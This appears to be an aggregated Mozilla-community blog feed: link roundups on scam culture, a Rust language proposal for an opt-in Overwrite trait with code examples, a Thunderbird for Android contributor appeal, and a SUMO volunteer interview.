Useful Idiots and Good Authoritarians Recycling some jokes here, but I think there’s something to be said for knowing an online illiberal’s favorite Good Authoritarian. Here’s what it says about them Related: With J.D. Vance on Trump ticket, the Nerd Reich goes national

Gamergate at 10 10 years later, the events of Gamergate remain a cipher through which it’s possible to understand a lot about our current sociocultural situation.

A Rose Diary Thanks to Mr. Austin these roses are now widely available and beautiful gardens around the world can be filled with roses that look like real roses and the smell of roses can be inhaled all over the world including on my own property.

Don MartiScam culture is everywhere

Just looking at recent news and how much of it is about surprisingly low-reputation decisions by surprisingly high-status business decision-makers. The big-picture trend that helps explain a lot of technology trends news is the ongoing collapse of business norms. Scam culture is getting mainstreamed faster than ever. Lots of related stories…

Online advertising is a…well, you knew that already. Brand safety a ‘con’ costing news industry billions, new research says How breaking up Google could lower your online shopping bill The Sleazy World of Reddit Marketing, Everything is Fake

Robot lawyers are fake. DoNotPay Has To Pay, After FTC Dings It For Lying About Its Non-Existent AI Lawyer

Academic publishing is a racket. Gates Foundation Shows That ‘Gold Open Access’ Was A Mistake, And ‘Diamond Open Access’ Is The Future

Other kinds of publishing are a racket, too. CNN and USA Today Have Fake Websites, I Believe Forbes Marketplace Runs Them Gannett’s ‘AI’ Scandals Result In Closure Of Wirecutter-esque Review Website, Layoffs

Pro sports are a racket. Legalizing Sports Gambling Was a Huge Mistake Want Access To Every NFL Game? It’ll Cost You, Thanks To Fractured Streaming Deals

Arrogant programmers and Enshittification - A New Understanding (read the whole thing. What happens when your self-worth is tied to work, but your boss is a growth hacker?)

Diseconomies of scale in fraud, spam, support, and moderation I don’t think it’s controversial to say that in general, a lot of things get worse as platforms get bigger.

The hate speech landscape on Facebook is worse than you thought. Here’s why In recent years, a growing number of politicians, human rights groups, and watchdogs have claimed that not only is Meta doing a poor job of removing harmful content, but its process for making enforcement decisions is happening in what they see as a black box. (There has always been some overlap between direct/database/online marketing, fraud, and right-wing politics in the USA. Goes back at least to the 1920s KKK boom. But today the connection is particularly strong. Maybe the national security Republicans were helping to keep that party from going into full growth hacker mode?) The return of Jacob Wohl! Yeah, he’s into AI now Trump’s $100,000 Watch Likely Made in China, Vastly Overpriced

Is Your Rent an Antitrust Violation? (Maybe we need a Lina Khan Signal, like the Batsignal but for Lina Khan?)

Anyway, it’s time to revise a lot of assumptions that were originally made in the higher-trust business environment of the early, legit Web in its create more value than you capture days. Now that more devices, products, and services reflect scam culture settings by default, the rewards to tweaking, blocking, and other growth hacking avoidance are similar to the rewards for PC power user skills back when those were a thing. More: Return of the power user

Niko MatsakisMaking overwrite opt-in #crazyideas

What would you say if I told you that it was possible to (a) eliminate a lot of “inter-method borrow conflicts” without introducing something like view types and (b) make pinning easier even than boats’s pinned places proposal, all without needing pinned fields or even a pinned keyword? You’d probably say “Sounds great… what’s the catch?” The catch is that it requires us to change Rust’s fundamental assumption that, given x: &mut T, you can always overwrite *x by doing *x = /* new value */, for any type T: Sized. This kind of change is tricky, but not impossible, to do over an edition.

TL;DR

We can reduce inter-procedural borrow check errors, increase clarity, and make pin vastly simpler to work with if we limit when it is possible to overwrite an &mut reference. The idea is that if you have a mutable reference x: &mut T, it should only be possible to overwrite *x via *x = /* new value */ or to swap its value via std::mem::swap if T: Overwrite. To start with, most structs and enums would implement Overwrite, and it would be a default bound, like Sized; but we would transition in a future edition to have structs/enums be !Overwrite by default and to have T: Overwrite bounds written explicitly.

Structure of this series

This blog post is part of a series:

  1. This first post will introduce the idea of immutable fields and show why they could make Rust more ergonomic and more consistent. It will then show how overwrites and swaps are the key blocker and introduce the idea of the Overwrite trait, which could overcome that.
  2. In the next post, I’ll dive deeper into Pin and how the Overwrite trait can help there.
  3. After that, who knows? Depends on what people say in response.1

If you could change one thing about Rust, what would it be?

People often ask me to name something I would change about Rust if I could. One of the items on my list is the fact that, given a mutable reference x: &mut SomeStruct to some struct, I can overwrite the entire value of x by doing *x = /* new value */, versus only modifying individual fields like x.field = /* new value */.

Having the ability to overwrite *x always seemed very natural to me, having come from C, and it’s definitely useful sometimes (particularly with Copy types like integers or newtyped integers). But it turns out to make borrowing and pinning much more painful than they would otherwise have to be, as I’ll explain shortly.

In the past, when I’ve thought about how to fix this, I always assumed we would need a new form of reference type, like &move T or something. That seemed like a non-starter to me. But at RustConf last week, while talking about the ergonomics of Pin, a few of us stumbled on the idea of using a trait instead. Under this design, you can always make an x: &mut T, but you can’t always assign to *x as a result. This turns out to be a much smoother integration. And, as I’ll show, it doesn’t really give up any expressiveness.

Motivating example #1: Immutable fields

In this post, I’m going to motivate the changes by talking about immutable fields. Today in Rust, when you declare a local variable let x = …, that variable is immutable by default2. Fields, in contrast, inherit their mutability from the outside: when a struct appears in a mut location, all of its fields are mutable.

Not all fields are mutable, but I can’t declare that in my Rust code

It turns out that declaring local variables as mut is not needed for the borrow checker — and yet we do it nonetheless, in part because it helps readability. It’s useful to see when a variable might change. But if that argument holds for local variables, it holds double for fields! For local variables, we can find all potential mutation just by searching one function. To know if a field may be mutated, we have to search across many functions. And for fields, precisely because they can be mutated across functions, declaring them as immutable can actually help the borrow checker to see that your code is safe.

Idea: Declare fields as mutable

So what if we extended the mutable declaration to fields? The idea would be that, in your struct, if you want to mutate fields, you have to declare them as mut. This would allow them to be mutated: but only if the struct itself appears in a mutable location.

For example, maybe I have an Analyzer struct that is created with some vector of datums and which has to compute the number of “important” ones:

#[derive(Default)]
struct Analyzer {
    /// Data being analyzed: will never be modified.
    data: Vec<Datum>,

    /// Number of important datums uncovered so far.
    mut important: usize,
}

As you can see from the struct declaration, the field data is declared as immutable. This is because we are only going to be reading the Datum values. The important field is declared as mut, indicating that it will be updated.

When can you mutate fields?

In this world, mutating a field is only possible when (1) the struct appears in a mutable location and (2) the field you are referencing is declared as mut. So this code compiles fine, because the field important is mut:

let mut analyzer = Analyzer::new();
analyzer.important += 1; // OK: mut field in a mut location

But this code does not compile, because the local variable x is not:

let x = Analyzer::default();
x.important += 1; // ERROR: `x` not declared as mutable

And this code does not compile, because the field data is not declared as mut:

let mut x = Analyzer::default();
x.data.clear(); // ERROR: field `data` is not declared as mutable

Leveraging immutable fields in the borrow checker

So why is it useful to declare fields as mut? Well, imagine you have a method like increment_if_important, which checks if datum.is_important() is true and modifies the important flag if so:

impl Analyzer {
    fn increment_if_important(&mut self, datum: &Datum) {
        if datum.is_important() {
            self.important += 1;
        }
    }
}

Now imagine you have a function that loops over self.data and calls increment_if_important on each item:

impl Analyzer {
    fn count_important(&mut self) {
        for datum in &self.data {
            self.increment_if_important(datum);
        }
    }
}

I can hear the experienced Rustaceans crying out in pain now. This function, natural as it appears, will not compile in Rust today. Why is that? Well, we have a shared borrow on self.data but we are trying to call an &mut self function, so we have no way to be sure that self.data will not be modified.

But what about immutable fields? Doesn’t that solve this?

Annoyingly, immutable fields on their own don’t change anything! Why? Well, just because you can’t write to a field directly doesn’t mean you can’t mutate the memory it’s stored in. For example, maybe I write a malicious version of increment_if_important:

impl Analyzer {
    fn malicious_increment_if_important(&mut self, datum: &Datum) {
        *self = Analyzer::default();
    }
}

This version never directly accesses the field data, but it just writes to *self, and hence it has the same impact. Annoying!

Generics: why we can’t trivially disallow overwrites

Maybe you’re thinking “well, can’t we just disallow overwriting *self if there are fields declared mut?” The answer is yes, we can, and that’s what this blog post is about. But it’s not as simple as it sounds, because we are changing the “basic contract” that all Rust types currently satisfy. In particular, Rust today assumes that if you have a reference x: &mut T and a value v: T, you can always do *x = v and overwrite the referent of x. That means I can write a generic function like set_to_default:

fn set_to_default<T: Default>(r: &mut T) {
    *r = T::default();
}

Now, since Analyzer implements Default, I can make increment_if_important call set_to_default. This will still free self.data, but it does it in a sneaky way, where we can’t obviously tell that the value being overwritten is an instance of a struct with mut fields:

impl Analyzer {
    fn malicious_increment_if_important(&mut self, datum: &Datum) {
        // Overwrites `self.data`, but not in an obvious way
        set_to_default(self);
    }
}

Recap

So let’s step back and recap what we’ve seen so far:

  • If we could distinguish which fields were mutable and which were definitely not, we could eliminate many inter-function borrow check errors3.
  • However, just adding mut declarations is not enough, because fields can also be mutated indirectly. Specifically, when you have a &mut SomeStruct, you can overwrite with a fresh instance of SomeStruct or swap with another &mut SomeStruct, thus changing all fields at once.
  • Whatever fix we use has to consider generic code like std::mem::swap, which mutates an &mut T without knowing precisely what T is. Therefore we can’t do something simple like looking to see if T is a struct with mut fields4.

The trait system to the rescue

My proposal is to introduce a new, built-in marker trait called Overwrite:

/// Marker trait that permits overwriting
/// the referent of an `&mut Self` reference.
#[marker] // <-- means the trait cannot have methods
trait Overwrite: Sized {}

The effect of Overwrite

As a marker trait, Overwrite does not have methods, but rather indicates a property of the type. Specifically, assigning to a borrowed place of type T requires that T: Overwrite is implemented. For example, the following code writes to *x, which has type T; this is only legal if T: Overwrite:

fn overwrite<T>(x: &mut T, t: T) {
    *x = t; // <— requires `T: Overwrite`
}

Given that this code compiles today, this implies that a generic type parameter declaration like <T> would require a default Overwrite bound in the current edition. We would want to phase these defaults out in some future edition, as I’ll describe in detail later on.

Similarly, the standard library’s swap function would require a T: Overwrite bound, since it (via unsafe code) assigns to *x and *y:

fn swap<T>(x: &mut T, y: &mut T) {
    unsafe {
        let tmp: T = std::ptr::read(x);
        std::ptr::write(x, std::ptr::read(y)); // overwrites `*x`, `T: Overwrite` required
        std::ptr::write(y, tmp); // overwrites `*y`, `T: Overwrite` required
    }
}

Overwrite requires Sized

The Overwrite trait requires Sized because, for *x = /* new value */ to be safe, the compiler needs to ensure that the place *x has enough space to store “new value”, and that is only possible when the size of the new value is known at compilation time (i.e., the type implements Sized).

Overwrite only applies to borrowed values

The Overwrite trait is only needed when assigning to a borrowed place of type T. If that place is owned, the owner is allowed to reassign it, just as they are allowed to drop it. So e.g. the following code compiles whether or not SomeType: Overwrite holds:

let mut x: SomeType = /* something */;
x = /* something else */; // <— does not require that `SomeType: Overwrite` holds

Subtle: Overwrite is not infectious

Somewhat surprisingly, it is ok to have a struct that implements Overwrite which has fields that do not. Consider the types Foo and Bar, where Foo: Overwrite holds but Bar: Overwrite does not:

struct Foo(Bar);
struct Bar;
impl Overwrite for Foo { }
impl !Overwrite for Bar { }

The following code would type check:

let foo = &mut Foo(Bar);
// OK: Overwriting a borrowed place of type `Foo`
// and `Foo: Overwrite` holds.
*foo = Foo(Bar);

However, the following code would not:

let foo = &mut Foo(Bar);
// ERROR: Overwriting a borrowed place of type `Bar`
// but `Bar: Overwrite` does not hold.
foo.0 = Bar;

Types that do not implement Overwrite can therefore still be overwritten in memory, but only as part of overwriting the value in which they are embedded. In the FAQ I show how this non-infectious property preserves expressiveness.5

Who implements Overwrite?

This section walks through which types should implement Overwrite.

Copy implies Overwrite

Any type that implements Copy would automatically implement Overwrite:

impl<T: Copy> Overwrite for T { }

(If you, like me, get nervous when you see blanket impls due to coherence concerns, it’s worth noting that RFC #1268 allows for overlapping impls of marker traits, though that RFC is not yet fully implemented nor stable. It’s not terribly relevant at the moment anyway.)

“Pointer” types are Overwrite

Types that represent pointers all implement Overwrite for all T:

  • &T
  • &mut T
  • Box<T>
  • Rc<T>
  • Arc<T>
  • *const T
  • *mut T
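
Spelled out, those impls might look roughly like this. It is only a sketch; the overlap with the Copy blanket impl above (for &T, *const T, and *mut T) assumes the overlapping marker impls of RFC #1268 mentioned earlier:

// Only the pointer itself is ever overwritten, so the pointee type `T`
// may be `?Sized` and does not itself need to implement `Overwrite`.
impl<'a, T: ?Sized> Overwrite for &'a T { }
impl<'a, T: ?Sized> Overwrite for &'a mut T { }
impl<T: ?Sized> Overwrite for Box<T> { }
impl<T: ?Sized> Overwrite for std::rc::Rc<T> { }
impl<T: ?Sized> Overwrite for std::sync::Arc<T> { }
impl<T: ?Sized> Overwrite for *const T { }
impl<T: ?Sized> Overwrite for *mut T { }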

dyn, [], and other “unsized” types do not implement Overwrite

Types that do not have a static size, like dyn and [], do not implement Overwrite. Safe Rust already disallows writing code like *x = … in such cases.

There are ways to do overwrites with unsized types in unsafe code, but they’d have to prove various bounds. For example, overwriting a [u32] value could be ok, but you have to know the length of data. Similarly swapping two dyn Value referents can be safe, but you have to know that (a) both dyn values have the same underlying type and (b) that type implements Overwrite.

Structs and enums

The question of whether structs and enums should implement Overwrite is complicated because of backwards compatibility. I’m going to distinguish two cases: Rust 2021, and Rust Next, which is Rust in some hypothetical future edition (surely not 2024, but maybe the one after that).

Rust 2021. Struct and enum types in Rust 2021 implement Overwrite by default. Structs could opt out of Overwrite with an explicit negative impl (impl !Overwrite for S).

Integrating mut fields. Structs that have opted out of Overwrite require mutable fields to be declared as mut. Fields not declared as mut are immutable. This gives them the nicer borrow check behavior.6
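
To make that concrete, here is how the Analyzer type from the start of this post might look under these Rust 2021 rules. This is a sketch using the hypothetical mut-field syntax and the explicit negative impl described above:

#[derive(Default)]
struct Analyzer {
    /// Not declared `mut`: immutable once constructed. Because `Analyzer`
    /// opts out of `Overwrite`, the borrow checker can rely on that.
    data: Vec<Datum>,

    /// Declared `mut`: may be updated through `&mut Analyzer`.
    mut important: usize,
}

// Opting out rules out whole-struct overwrites and swaps, which is what
// would otherwise let `data` be replaced behind the borrow checker's back.
impl !Overwrite for Analyzer { }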

Rust Next. In some future edition, we can swap the default, with fields being !Overwrite by default and having to opt-in to enable overwrites. This would make the nice borrow check behavior the default.

Futures and closures

Futures and closures can implement Overwrite iff their captured values implement Overwrite, though in future editions it would be best if they simply do not implement Overwrite.

Default bounds and backwards compatibility

The other big backwards compatibility issue has to do with default bounds. In Rust 2021, every type parameter declared as T implicitly gets a T: Sized bound. We would have to extend that default to be T: Sized + Overwrite. This also applies to associated types in trait definitions and impl Trait types.7

Interestingly, type parameters declared as T: ?Sized also opt out of Overwrite. Why is that? Well, remember that Overwrite: Sized, so if T is not known to be Sized, it cannot be known to be Overwrite either. This is actually a big win. It means that types like &T and Box<T> can work with “non-overwrite” types out of the box.
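
For example (a sketch; the function name is just illustrative), a generic function that already relaxes the Sized default would keep accepting the Bar type from earlier, which does not implement Overwrite:

fn measure<T: ?Sized>(value: &T) -> usize {
    // `T: ?Sized` means no implied `Sized` bound, and since
    // `Overwrite: Sized`, no implied `Overwrite` bound either.
    // So `measure(&Bar)` is fine even though `Bar: !Overwrite`.
    std::mem::size_of_val(value)
}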

Associated type bounds are annoying, but perhaps not fatal

Still, the fact that default bounds apply to associated types and impl Trait is a pain in the neck. For example, it implies that Iterator::Item would require its items to be Overwrite, which would prevent you from authoring iterators that iterate over structs with immutable fields. This can to some extent be overcome by associated type aliases8 (we could declare Item to be a “virtual associated type”, mapping to Item2021 in older editions, which require Overwrite, and ItemNext in newer ones, which do not).

Frequently asked questions

OMG endless words. What did I just read?

Let me recap!

  • It would be more declarative and create fewer borrow check conflicts if we had users declare their fields as mut when they may be mutated and we were able to assume that non-mut fields will never be mutated.
    • If we were to add this, in the current Rust edition it would obviously be opt-in.
    • But in a future Rust edition it would become mandatory to declare fields as mut if you want to mutate them.
  • But to do that, we need to prevent overwrites and swaps. We can do that by introducing a trait, Overwrite, that is required in order to assign to a borrowed place of a given type.
    • In the current Rust edition, this trait would be added by default to all type parameters, associated types, and impl Trait bounds; it would be implemented by all structs, enums, and unions.
    • In a future Rust edition, the trait would no longer be the default, and structs, enums, and unions would have to implement it explicitly if they want to be overwritable.

This change doesn’t seem worth it just to get immutable fields. Is there more?

But wait, there’s more! Oh, you just said that. Yes, there’s more. I’m going to write a follow-up post showing how opting out from Overwrite eliminates most of the ergonomic pain of using Pin.

In “Rust Next”, who would ever implement Overwrite manually?

I said that, in Rust Next, types should be !Overwrite by default and require people to implement Overwrite manually if they want to. But who would ever do that? It’s a good question, because I don’t think there’s very much reason to.

Because Overwrite is not infectious, you can actually make a wrapper type…

#[repr(transparent)]
struct ForceOverwrite<T> { t: T }
impl<T> Overwrite for ForceOverwrite<T> { }

…and now you can put values of any type X into a ForceOverwrite<X>, which can be reassigned.

This pattern allows you to make “local” use of overwrite, for example to implement a sorting algorithm (which has to do a lot of swapping). You could have a sort function that takes an &mut [T] for any T: Ord (Overwrite not required):

fn sort<T: Ord>(data: &mut [T])

Internally, it can safely transmute the &mut [T] to a &mut [ForceOverwrite<T>] and sort that. Note that at no point during that sorting are we moving or overwriting an element while it is borrowed (the slice that owns it is borrowed, but not the elements themselves).
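
Here is a rough sketch of what that could look like, assuming the ForceOverwrite wrapper above; the transmute relies on #[repr(transparent)] making the two slice types layout-compatible:

fn sort<T: Ord>(data: &mut [T]) {
    // SAFETY (sketch): `ForceOverwrite<T>` is `#[repr(transparent)]`
    // over `T`, so `&mut [T]` and `&mut [ForceOverwrite<T>]` have the
    // same layout.
    let data: &mut [ForceOverwrite<T>] =
        unsafe { std::mem::transmute::<&mut [T], &mut [ForceOverwrite<T>]>(data) };

    // A simple insertion sort. Swapping elements is allowed because
    // `ForceOverwrite<T>: Overwrite` holds by construction, even though
    // `T` itself may not implement `Overwrite`.
    for i in 1..data.len() {
        let mut j = i;
        while j > 0 && data[j - 1].t > data[j].t {
            data.swap(j - 1, j);
            j -= 1;
        }
    }
}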

What is the relationship of Overwrite and Unpin?

I’m still puzzling over that myself. I think that Overwrite is “morally the same” as Unpin, but it is much more powerful (and ergonomic) because it is integrated into the behavior of &mut (of course, this comes at the cost of a complex backwards compatibility story).

Let me describe it this way. Types that do not implement Overwrite cannot be overwritten while borrowed, and hence are “pinned for the duration of the borrow”. This has always been true for &T, but for &mut T has traditionally not been true. We’ll see in the next post that Pin<&mut T> basically just extends that guarantee to apply indefinitely.

Compare that to types that do not implement Unpin and hence are “address sensitive”. Such types are pinned for the duration of a Pin<&mut T>. Unlike T: !Overwrite types, they are not pinned by &mut T references, but that’s a bug, not a feature: this is why Pin has to bend over backwards to prevent you from getting your hands on an &mut T.

I’ll explain this more in my next post, of course.

Should Overwrite be an auto trait?

I think not. If we did so, it would lock people into semver hazards in the “Rust Next” edition where mut is mandatory for mutation. Consider a struct Foo { value: u32 } type. This type has not opted into becoming Copy, but it only contains types that are Copy and therefore Overwrite. By auto trait rules it would by default be Overwrite. But that would prevent you from adding a mut field in the future, or from benefiting from immutable fields. This is why I said the default would just be !Overwrite, no matter the field types.

Conclusion

Obama Mic Drop

=)


  1. After this grandiose intro, hopefully I won’t be printing a retraction of the idea due to some glaring flaw… eep! ↩︎

  2. Whenever I say immutable here, I mean immutable-modulo-Cell, of course. We should probably find another word for that; this is the kind of terminology debt that Rust has bought its way into and I’m not sure the best way for us to get out! ↩︎

  3. Immutable fields don’t resolve all inter-function borrow conflicts. To do that, you need something like view types. But in my experience they would eliminate many. ↩︎

  4. The simple solution — if a struct has mut fields, disallow overwriting it — is basically what C++ does with their const fields. Classes or structs with const fields are more limited in how you can use them. This works in C++ because templates are not checked for validity until after substitution. ↩︎

  5. I love the Felleisen definition of “expressiveness”: two language features are equally expressive if one can be converted into the other with only local rewrites, which I generally interpret as “rewrites that don’t affect the function signature (or other abstraction boundary)”. ↩︎

  6. We can also make the !Overwrite impl implied by declaring fields mut, of course. This is fine for backwards compatibility, but isn’t the design I would want long-term, since it introduces an odd “step change” where declaring one field as mut implicitly declares all other fields as immutable (and, conversely, deleting the mut keyword from that field has the effect of declaring all fields, including that one, as mutable). ↩︎

  7. The Self type in traits is exempt from the Sized default, and it could be exempt from the Overwrite default as well, unless the trait is declared as Sized↩︎

  8. Hat tip to TC, who pointed this out to me. ↩︎

Mozilla ThunderbirdContribute to Thunderbird for Android

The wait is almost over! Thunderbird for Android will be here soon. As an open-source project, we could not succeed without the incredible volunteer contributors who help us along the way. Whether you’re a fan of problem-solving, localization, testing, development, or even just spreading the word, there’s a role for you in our community. Contributing doesn’t just benefit us – it’s a great way to grow your own skills and make a real difference in the lives of thousands of Thunderbird users worldwide. However you choose to contribute to Thunderbird for Android, we’re always happy to welcome new friends to the project!

Support

If you’re a natural at getting to the root of problems, consider becoming a support contributor!

When you answer a support question, you’re not only helping the person who asked the question, you’re helping the hundreds if not thousands of people who read it. Or if you like writing and editing, you can help with our knowledge base (KB) articles!

Support for Thunderbird on Android will live on Mozilla Support, aka SUMO, just like support for the Desktop application, but under its own product tile. We’ve put together a guide to get you started on SUMO, from setting up an account and finding questions to best practices, whether you decide to help in the question forums or in the KB articles. Want to talk to other support volunteers? Join us on our Support Crew Matrix channel.

Localization

Thunderbird’s users are all over the world, and our localization contributors put the app and support articles into their languages. Thunderbird for Android’s localization lives on Weblate, a copyleft libre continuous localization platform that powers many other open source projects. If you haven’t used Weblate before, they have a useful guide for getting started.

Testing

If you want to try the newest features and help us polish and perfect them before they make it to a general release, join us as a tester. Testers are comfortable using daily and beta releases and providing meaningful feedback to developers.

When they’re available, you can download the Thunderbird for Android Beta releases from the Google Play Store or from GitHub under ‘Pre-Release’. F-Droid users will need to manually select beta versions. To get update notifications for non-suggested versions you need to check ‘Settings > Expert mode > Unstable updates’ in the F-Droid app.

Just like Thunderbird for desktop, we have a mailing list where you can give feedback and talk to developers and fellow beta testers.

Development

Interested in helping at the code level? All our development happens on our GitHub page, where you can read the code contributor section in our CONTRIBUTING.md file.

Look for issues that are tagged ‘good first issue,’ even if you’re an experienced developer but are new to Thunderbird for Android. Use the android-planning mailing list to talk to and get feedback from other developers.

Promote Thunderbird for Android

Spreading the word about Thunderbird for Android is an essential way to contribute, and there are many ways to do this. You can leave us a positive review on the Google Play Store (if you had a positive experience, of course) and encourage others to download and try Thunderbird for Android. This could be friends or family, a local computer club, or any other group you could think of! We’d love to hear your ideas and find a way to support you on the android-planning mailing list.

Financial Support

Financial support is a fantastic way to ensure the project continues to thrive. Your gift goes toward improving features, fixing bugs, and expanding the app’s functionality for all of its users.

By supporting Thunderbird financially, you’re investing in open-source software that respects your privacy and gives you control over your data. Every contribution, no matter how small, helps us maintain our independence and stay true to our mission.

The post Contribute to Thunderbird for Android appeared first on The Thunderbird Blog.

Support.Mozilla.OrgContributor spotlight – Noah Y

Hey everybody,

In today’s edition of our Contributor Spotlight, I’m thrilled to introduce you to Noah Y, a longtime contributor to our community forums. Noah’s excellence lies in his eagle-eyed investigation, most recently demonstrated when he identified that NordVPN’s web protection feature was causing Firefox auto-updates to fail. Thanks to his thorough investigation, the issue was escalated, and the SUMO content team was able to create a troubleshooting article to address the issue. In the end, NordVPN was able to resolve the problem after one of our engineers filed a support ticket with their team.

… So the way I decide if it’s worth escalating is if it affects any major/popular service or website. Because then I know thousands & possibly millions of Firefox users could be hitting the same bug quietly becoming very angry or frustrated each time they run into the problem.

Q: Please tell us about yourself

I love troubleshooting tough problems. And I love working with tech. Computers, TVs, you name it. I would take apart any electronics just on a small hope I could fix them or at least clean out the tons of dust hiding in them. I’m always intrigued by cars, tech & software. Despite this big interest, I never pursued an engineering or computer science degree. Which leaves me wishing I knew how to code. But if I did, it might have become too much of an obsession since I would want to fix everything that annoys me in my favorite software. So I’m happy I didn’t go down that path.

Q: I believe you’ve been involved with Mozilla since SUMO started. Can you tell us more about how you started contributing and what motivates you to keep going until now?

That’s right. I did start way back in 2004 by testing Firefox Nightly builds on a very cool forum community called MozillaZine Forums. Everyone helped report bugs & issues that needed to be fixed. I was good at that. Seeing those bugs get fixed was very satisfying & motivating.

But I never provided true support on those forums, I just helped test & confirm other people’s bugs/issues. The community there was very engaging & still is to this day over 20 yrs later.

I think the way I got started contributing to SUMO in 2008, when it first launched, was by just answering a few questions by chance & seeing what would happen. I think I also felt bad at the time that there were so many questions being asked with only a few helpers. It looked overwhelming. I mostly remember a ton of questions about Firefox crashes & homepage/search engine hijacking by malware or bad add-ons.

Q: Can you describe your workflow when working on the forum? 

I try to jump around in the forums looking for missed genuine questions where the user looks really troubled but also gives a sense that they will reply. Anyone who cares enough to reply back to us once we respond is always someone I’m very interested in helping. Depending on their skills, they can also report back to us what setting, add-on or 3rd party software broke Firefox for them. So that can help us solve many more questions about the same issue.

Q: Can you share your tips and tricks for handling a difficult user on the forum? What’s your advice for other community members to avoid being overwhelmed with so many things to do?

I would say try to relate to the angry user’s frustration & let them know you understand how bad/annoying of a situation this is. I usually make it a point to let them know of past & recent issues where a website, add-on, or 3rd party software broke Firefox & that it’s not always Firefox’s fault when something breaks. There is a perception out there that every annoying issue is caused by Firefox itself or a Firefox update. This doesn’t calm down every angry user but for the reasonable users, they now understand that the blame is either shared or coming from the other side entirely.

For overwhelmed forum helpers, my advice is to reduce how many questions you respond to. I’m always surprised by how many new questions are posted daily & how I realize that not all of them are going to get solved. With that understanding, I have made my peace with only helping as many people as I can without feeling like I’m going to burnout.

Q: You have a knack for noticing trending topics on the forum. Do you have a specific way to keep track of issues, and how can you tell if an issue is worth escalating?

Thank you! I wasn’t sure if anyone else noticed that. It’s a blessing & a curse. Because once I discover a trending topic like that, I keep collecting as much info as possible & keep drilling into the details until I unlock a clue. And I won’t stop until we solve it or it’s ruled so hopeless that no one can fix it. It’s honestly like detective work.

I try to keep notes & a list of all the questions encountering the trending issue in a basic text document. Pretty old school. I may need a cooler tool to help organize & visualize this data. :) And as I keep tracking the issue & noticing more & more people appearing with the same issue, it becomes personal for me.

Because I used to be that user, suffering from some insane problem that was driving me crazy and it disrupted my work or enjoyment of the internet and absolutely nothing would solve it. When a problem becomes that severe, I realized that no one’s going to do anything about it until you start making a lot of noise & sounding the alarm bells & contacting the right people in power to help confirm, prioritize and get as many staff needed to get it fixed. Which by the way, is very awesome. As you can not easily escalate issues like this in other companies unless you are a staff member. Even then, the issue can still fall through the cracks unless you reach exactly the right person.

So the way I decide if it’s worth escalating is if it affects any major/popular service or website. Because then I know thousands & possibly millions of Firefox users could be hitting the same bug quietly becoming very angry or frustrated each time they run into the problem. Eventually they’ll become fatigued & come to the SUMO forums to vent about it or plead their desperation for getting it fixed as its ruining their lives in a lot of important areas (Can’t login to bank site, can’t watch movie/tv shows, can’t pay bills, can’t login to webmail, can’t access Medicare/Social security site, etc.). I try to proactively hunt these issues down before they become major trends. :)

Q: Given your experience, can you mention one or two things that you would consider helpful for SUMO contributors to know, based on your experience in the community forums?

That the browser is always changing & websites aren’t making sure they work in Firefox anymore. So it’s going to become more noticeable in the questions they see that certain websites are going to break more often & add-ons are going to break websites as well.

My advice would be to treat all antivirus software & all add-ons as the source of a weird issue the user is seeing. 95%+ of all problems dealing with websites not working or having a weird glitch are caused by add-ons, antivirus add-ons or the antivirus software itself intercepting all the internet traffic & blocking the wrong things causing the website to fail in Firefox.

Q: What excites you the most about Firefox development these days?

How there seems to be a refocused & dedicated effort to fix things that users are annoyed with & to build features they actually want.

Q: What are the biggest challenges you’re facing as a SUMO contributor at the moment? What would you like to see from us in the future?

SUMO is a great community and I think we just need a few more tools to reduce repetitive tasks. One idea is to be able to save personal canned responses for each forum helper so they don’t have to copy & paste them from their personal notes. Another could be to help us view a more cleanly formatted list of a user’s add-ons in the System Details area, so we can take a look quickly without parsing a very large amount of JSON to find that information.

The biggest challenge, I feel, is not knowing if a user had their problem resolved. Since the way people interact with forums has changed thanks to social media, they don’t really have the time to come back & post a reply. So sometimes they just give a thumbs up to our post. Which makes me wonder, does that mean my answer solved their problem? I think the thumbs up is the new way of saying your answer solved their issue. So maybe surfacing that information in an easy-to-see place will help me know my impact on resolving problems.

Jscher did something clever about that on his “My Questions” SUMO Contributor tool, which shows a heart emoji (❤️) at the top of your post if any user liked your post.

Q: Can you tell us a story about the most rewarding moment and impactful contribution you’ve made in SUMO?

This is a tough but good question. It’s kinda hard to remember since I can’t search my answers past a certain point. But there have been a few big battles that I’ve totally forgotten I helped with. Thankfully Bugzilla has a lot of the big ones I helped solve.

One big moment was helping identify the cause of Firefox auto-updates failing for many users, who kept getting error popups about the failed updates. I could see this was going to get worse fast so I filed a bug and included as much of my findings as I could. And a Firefox dev (the awesome Nick Alexander) confirmed my findings & escalated the bug to NordVPN. It took a while (3 weeks) but NordVPN finally fixed it.

I think the most impactful contribution was giving feedback & filing bugs about site enhancements, moderation tools and site usability to SUMO over the years to make it easier & more productive for users, contributors and moderators to use the site. Special shout out to the team who originally built SUMO & helped build all our ideas into reality: Kadir Topal, Ricky Rosario, Mike Cooper, Will Kahn-Greene and Rehan Dalal. I really couldn’t have gotten anything done without this amazing team.

Q: You’ve had a few chances to meet with SUMO staff and other contributors in the past. Can you tell us more about the most productive in-person event or meeting you’ve had? What value did you get from these events?

These in-person events have been amazing. Maybe I can even say life changing because I was able to meet genuinely good people that I was able to call friends and some best friends. From what I’ve seen, Mozilla has the tendency to attract very smart people but also ones who help develop you into a better person through all the interactions you have with them.

Q: What advice would you give to someone new who wants to contribute to SUMO?

Take your time contributing. You don’t have to rush out a specific number of answers or KB article edits a day. You don’t even have to volunteer to help every day of the week. Work at your own pace. Either super slow, regular slow or just average speed. The Knowledge Base where all our support articles live will always be there. So you don’t have to rush to 100% completion to translate them to your locale. And on the forum side, the amount of questions that come to the SUMO platform are endless. Worse than that, not everyone you provide an answer to will respond back. So you may have wasted a lot of time customizing & curating a really good answer for someone, just to have them never respond at all or just put a simple thumbs down vote on your post. That’s happened to me quite a few times & I didn’t love it. So you could use my motto: Quality over quantity. A few quality posts here & there over posting 50 quick answers to which no one might reply.

That strategy/mantra will help you from burning out quickly.

And to counteract that missing feeling of engagement, I cherry pick forum questions that I think have a higher chance of reply based on how the person has stated their problem & if they seem invested in getting an answer. It’s tricky to do & you don’t always get it right. But developing this skill over time can help you respond to better people who will engage back with you & actually let you know if your advice helped or failed them. Which is where I get the most satisfaction from.


I hope you enjoyed the read. If you’re interested in joining our product community just like Noah, please go to our contribute page to learn more. You can also reach out to us through the following channels:

SUMO contributor discussions: https://support.mozilla.org/forums/
SUMO Matrix room: https://matrix.to/#/#sumo:mozilla.org
Twitter/X: https://x.com/SUMO_Mozilla

Firefox NightlyFrom ESR to Address Bar – These Weeks in Firefox: Issue 168

Highlights

